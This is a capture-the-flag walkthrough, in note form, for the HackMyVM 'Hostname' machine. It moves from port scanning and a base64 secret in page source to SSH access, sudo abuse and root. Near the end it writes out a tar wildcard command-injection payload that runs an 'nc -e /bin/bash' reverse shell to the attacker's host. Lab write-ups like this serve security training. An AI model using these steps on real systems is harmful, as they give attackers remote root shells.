NOTES ABOUT Hostname
[ 2022-10-07 ] [ HackMyVM / Hostname ]Status: Rooted
Skills: Port Scanning, Static Code Analysis, Wildcard Command Injection, Reverse Shell, Sudo
Tools: nmap, nc
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)
| 256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)
|_ 256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Panda
|_http-server-header: nginx/1.18.0
GETTING IN
$ curl -L http://10.0.2.17/
[...]
<div class="form-group">
<input name="secret" required="required" class="form-control"/>
<label class="form-label">Secret Word</label>
</div>
<div class="form-group">
<p class="alert">Give Some Input..!!</p>
<!-- Kung Fu Panda -->
<button class="btn" name="username" disabled="po">Read</button>
</div>
</form>
<link rel="stylesheet" href="./assets/cool.css"><br><br>
<h2 style="font-size:4vw"><span>I</span>M<span>POSSIBLE</span></h2>
<script crossorigin="S3VuZ19GdV9QNG5kYQ==" src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src="./assets/script.js"></script>
$ echo "S3VuZ19GdV9QNG5kYQ==" | base64 -d
Kung_Fu_P4nda
REMOVED “DISABLED” IN BUTTON TAG WITH FIREFOX DEVELOPER TOOLS.
Pass: Kung_Fu_P4nda
ssh po@10.0.2.17
po@10.0.2.17's password:!ts-bl4nk
ELEVATING PRIVILEGES
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
po:x:1000:1000::/home/po:/bin/bash
oogway:x:1001:1001::/home/oogway:/bin/bash
$ find / -name po 2>/dev/null
/home/po
/etc/sudoers.d/po
/var/lib/sudo/lectured/po
$ cat /etc/sudoers.d/po
po HackMyVM = (oogway) NOPASSWD: /bin/bash
$ sudo -u oogway -h HackMyVM /bin/bash
oogway@hostname:/$
$ find / -name *.txt 2>/dev/null
/home/oogway/user.txt
$ cat /home/oogway/user.txt
$ find / -writable 2>/dev/null
/home/oogway
/home/oogway/.bash_history
/home/oogway/.bash_logout
/home/oogway/.profile
/home/oogway/.bashrc
/home/po/.bash_history
[...]
/opt/secret
$ grep -lir "/opt/secret" / 2>/dev/null
/etc/crontab
$ cat /etc/crontab
[...]
* * * * * root cd /opt/secret/ && tar -zcf /var/backups/secret.tgz *
[...]
"[...] bash expands * to be a list of the files and folders rather than passing it on the command [...]"
Tar arbitrary command execution [ WildCards_Gone_Wild.txt ]
NC LISTENER ON LOCAL PORT 80
$ touch -- --checkpoint=1
$ touch -- "--checkpoint-action=exec=sh rs"
$ echo "nc -e /bin/bash 10.0.2.15 80" >rs
WAIT FOR IT...
READ FLAG
$ cat /root/root.txt
$ init 0